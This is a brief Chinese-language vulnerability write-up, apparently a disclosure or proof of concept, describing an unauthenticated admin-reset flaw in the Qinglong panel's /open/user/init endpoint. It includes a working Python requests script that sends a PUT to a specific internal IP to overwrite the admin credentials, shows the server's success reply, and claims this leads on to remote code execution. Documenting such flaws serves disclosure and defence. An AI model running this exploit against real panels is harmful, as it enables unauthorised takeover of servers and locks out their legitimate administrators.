漏洞类型：未授权访问漏洞 / 权限绕过漏洞（可能导致远程代码执行 RCE）

漏洞利用路径：

攻击者通过暴露的 API 接口 /open/user/init 能够绕过认证，重新初始化系统用户。具体来说，可以通过 PUT 请求修改管理员账号和密码。

通过发送恶意请求（如修改用户名和密码），攻击者可以轻松获取对青龙面板的控制权限。

使用 requests 库发送 PUT 请求：

python
import requests

url = 'http://10.0.233.143:5700/open/user/init'
data = {
    "username": "admin",
    "password": "pwnedbywebdxg",
}
r = requests.put(url, data=data)
print(r.text)
# 服务器响应：{"code":200,"message":"更新成功"}

利用效果：

请求成功后，管理员密码会被修改为 pwnedbywebdxg，攻击者能够以管理员身份访问青龙面板。

漏洞影响：

权限绕过：攻击者能够通过简单的请求修改用户密码，获得管理员权限。

远程代码执行 (RCE)：通过成功的权限提升，攻击者可以执行远程代码，进一步控制目标系统。